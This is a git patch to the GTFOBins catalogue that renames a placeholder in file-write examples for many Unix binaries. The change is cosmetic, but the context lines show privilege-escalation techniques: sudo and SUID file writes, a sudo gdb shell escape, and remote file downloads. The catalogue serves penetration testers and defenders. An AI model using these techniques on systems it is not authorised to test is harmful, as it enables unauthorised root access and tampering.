From d4b50275bb026af2205e8db0db4ddfc990db90cf Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 20 Aug 2018 14:35:43 +0200
Subject: [PATCH] Use DATA as a placeholder for file-write operations

---
 _data/functions.yml | 8 ++++----
 _gtfobins/ash.md | 2 +-
 _gtfobins/awk.md | 2 +-
 _gtfobins/bash.md | 2 +-
 _gtfobins/busybox.md | 2 +-
 _gtfobins/csh.md | 2 +-
 _gtfobins/dash.md | 2 +-
 _gtfobins/dd.md | 2 +-
 _gtfobins/ed.md | 2 +-
 _gtfobins/emacs.md | 2 +-
 _gtfobins/gdb.md | 2 +-
 _gtfobins/ksh.md | 2 +-
 _gtfobins/lua.md | 2 +-
 _gtfobins/make.md | 2 +-
 _gtfobins/nano.md | 2 +-
 _gtfobins/pico.md | 2 +-
 _gtfobins/puppet.md | 2 +-
 _gtfobins/python2.md | 2 +-
 _gtfobins/python3.md | 2 +-
 _gtfobins/rlwrap.md | 2 +-
 _gtfobins/ruby.md | 2 +-
 _gtfobins/sed.md | 2 +-
 _gtfobins/shuf.md | 6 +++---
 _gtfobins/sqlite3.md | 2 +-
 _gtfobins/tar.md | 2 +-
 _gtfobins/tee.md | 6 +++---
 _gtfobins/vi.md | 2 +-
 _gtfobins/vim.md | 2 +-
 _gtfobins/xxd.md | 2 +-
 29 files changed, 36 insertions(+), 36 deletions(-)

diff --git a/_data/functions.yml b/_data/functions.yml
index 59a6f60..ca15889 100644
--- a/_data/functions.yml
+++ b/_data/functions.yml
@@ -75,11 +75,11 @@ load-library:
 file-read:
 label: File read
 description: |
- It reads files and may be used to do privileged reads or disclose files
- outside a restricted file system.
+ It reads data from files, it may be used to do privileged reads or disclose
+ files outside a restricted file system.
 file-write:
 label: File write
 description: |
- It writes files and may be used to do privileged writes or write files
- outside a restricted file system.
+ It writes data to files, it may be used to do privileged writes or write
+ files outside a restricted file system.
diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index 61216d6..aee72f4 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -5,7 +5,7 @@ functions:
 file-write:
 - code: |
 export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ ash -c 'echo DATA > $LFILE'
 suid-enabled:
 - code: "./ash"
 sudo-enabled:
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 3bf4517..08816ab 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -22,7 +22,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
 file-read:
 - code: |
 LFILE=file_to_read
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 55f6814..e39d79d 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -39,7 +39,7 @@ functions:
 file-write:
 - code: |
 export LFILE=file_to_write
- bash -c 'echo data > $LFILE'
+ bash -c 'echo DATA > $LFILE'
 file-read:
 - description: It trims trailing newlines and it's not binary-safe.
 code: |
diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md
index 7d22c7f..57ef0b9 100644
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
@@ -12,7 +12,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- busybox sh -c 'echo "data" > $LFILE'
+ busybox sh -c 'echo "DATA" > $LFILE'
 file-read:
 - code: |
 LFILE=file_to_read
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index 07716b7..3c161bf 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -5,7 +5,7 @@ functions:
 file-write:
 - code: |
 export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ ash -c 'echo DATA > $LFILE'
 suid-enabled:
 - code: "./csh -b"
 sudo-enabled:
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index b1dc72f..42facb4 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -5,7 +5,7 @@ functions:
 file-write:
 - code: |
 export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ ash -c 'echo DATA > $LFILE'
 suid-enabled:
 - code: ./dash -p
 sudo-enabled:
diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md
index c179268..79dfa97 100644
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@@ -3,7 +3,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- echo "data" | dd of=$LFILE
+ echo "DATA" | dd of=$LFILE
 file-read:
 - code: |
 LFILE=file_to_read
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index f2c85c6..8ef61c9 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -8,7 +8,7 @@ functions:
 - code: |
 ed file_to_write
 a
- data
+ DATA
 .
 w
 q
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 542f883..d04ba61 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -5,7 +5,7 @@ functions:
 file-write:
 - code: |
 emacs file_to_write
- data
+ DATA
 C-x C-s
 file-read:
 - code: emacs file_to_read
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index 3718449..f864555 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -11,7 +11,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
 sudo-enabled:
 - code: sudo gdb -nx -ex '!sh' -ex quit
 ---
diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md
index 434607a..a16514e 100644
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@@ -39,7 +39,7 @@ functions:
 file-write:
 - code: |
 export LFILE=file_to_write
- ksh -c 'echo data > $LFILE'
+ ksh -c 'echo DATA > $LFILE'
 file-read:
 - description: It trims trailing newlines.
 code: |
diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md
index d2f45ef..82c68d8 100644
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@@ -56,7 +56,7 @@ functions:
 f:write(d); io.close(f);'
 file-write:
- - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);'
+ - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
 file-read:
 - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
 sudo-enabled:
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index 3a0f825..6f89ca6 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -9,7 +9,7 @@ functions:
 - description: Requires a newer GNU `make` version.
 code: |
 LFILE=file_to_write
- make -s --eval="\$(file >$LFILE,data)" .
+ make -s --eval="\$(file >$LFILE,DATA)" .
 suid-enabled:
 - code: |
 COMMAND='/bin/sh -p'
diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md
index 2bb21b9..8004167 100644
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@@ -12,7 +12,7 @@ functions:
 file-write:
 - code: |
 nano file_to_write
- data
+ DATA
 ^O
 file-read:
 - code: nano file_to_read
diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md
index c5c5c0b..e350ebf 100644
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@@ -12,7 +12,7 @@ functions:
 file-write:
 - code: |
 pico file_to_write
- data
+ DATA
 ^O
 file-read:
 - code: pico file_to_read
diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md
index 868bf80..55f3918 100644
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@@ -9,7 +9,7 @@ functions:
 - description: The file path must be absolute.
 code: |
 export LFILE="/tmp/file_to_write"
- puppet apply -e "file { '$LFILE': content => 'data' }"
+ puppet apply -e "file { '$LFILE': content => 'DATA' }"
 file-read:
 - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
 code: |
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index 28c27e6..d82049c 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -25,7 +25,7 @@ functions:
 export LFILE=file_to_save
 python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
 file-write:
- - code: python2 -c 'open("file_to_write","w+").write("data")'
+ - code: python2 -c 'open("file_to_write","w+").write("DATA")'
 file-read:
 - code: python2 -c 'open("file_to_read").read()'
 load-library:
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 960d00c..d340df1 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -25,7 +25,7 @@ functions:
 export LFILE=file_to_save
 python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
 file-write:
- - code: python3 -c 'open("file_to_write","w+").write("data")'
+ - code: python3 -c 'open("file_to_write","w+").write("DATA")'
 file-read:
 - code: python3 -c 'open("file_to_read").read()'
 load-library:
diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md
index fd3b8a6..7dd28f8 100644
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@@ -6,7 +6,7 @@ functions:
 - description: This adds timestamps to the output file. This relies on the external `echo` command.
 code: |
 LFILE=file_to_write
- rlwrap -l "$LFILE" echo data
+ rlwrap -l "$LFILE" echo DATA
 suid-enabled:
 - code: ./rlwrap -H /dev/null /bin/sh -p
 sudo-enabled:
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index e24cc96..65c0d3c 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -22,7 +22,7 @@ functions:
 export LFILE=file_to_save
 ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
 file-write:
- - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
 file-read:
 - code: ruby -e 'puts File.read("file_to_read")'
 load-library:
diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md
index 987e56e..be83f84 100644
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
@@ -9,7 +9,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- sed -n "1s/.*/data/w $LFILE" /etc/hosts
+ sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
 file-read:
 - code: |
 LFILE=file_to_read
diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md
index eedba39..7548a90 100644
--- a/_gtfobins/shuf.md
+++ b/_gtfobins/shuf.md
@@ -4,14 +4,14 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- shuf -e data -o "$LFILE"
+ shuf -e DATA -o "$LFILE"
 suid-enabled:
 - description:
 code: |
 LFILE=file_to_write
- ./shuf -e data -o "$LFILE"
+ ./shuf -e DATA -o "$LFILE"
 sudo-enabled:
 - code: |
 LFILE=file_to_write
- sudo shuf -e data -o "$LFILE"
+ sudo shuf -e DATA -o "$LFILE"
 ---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index 180edda..d826e24 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -5,7 +5,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
+ sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";'
 file-read:
 - code: |
 LFILE=file_to_read
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index 73491e6..1cf26dd 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -10,7 +10,7 @@ functions:
 code: |
 LFILE=file_to_write
 TF=$(mktemp)
- echo data > "$TF"
+ echo DATA > "$TF"
 tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
 file-read:
 - description: This only works for GNU tar.
diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md
index 9dca238..cee23f4 100644
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@@ -4,13 +4,13 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
+ echo DATA | ./tee -a "$LFILE"
 suid-enabled:
 - code: |
 LFILE=file_to_write
- echo data | ./tee -a "$LFILE"
+ echo DATA | ./tee -a "$LFILE"
 sudo-enabled:
 - code: |
 LFILE=file_to_write
- echo data | sudo tee -a "$LFILE"
+ echo DATA | sudo tee -a "$LFILE"
 ---
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index cdb505e..32842f6 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -9,7 +9,7 @@ functions:
 file-write:
 - code: |
 vi file_to_write
- idata
+ iDATA
 ^[
 w
 file-read:
diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md
index dbc0825..c2328e0 100644
--- a/_gtfobins/vim.md
+++ b/_gtfobins/vim.md
@@ -9,7 +9,7 @@ functions:
 file-write:
 - code: |
 vim file_to_write
- idata
+ iDATA
 ^[
 w
 file-read:
diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md
index 1ed5eff..3ef9d4a 100644
--- a/_gtfobins/xxd.md
+++ b/_gtfobins/xxd.md
@@ -3,7 +3,7 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- echo data | xxd | xxd -r - "$LFILE"
+ echo DATA | xxd | xxd -r - "$LFILE"
 file-read:
 - code: |
 LFILE=file_to_read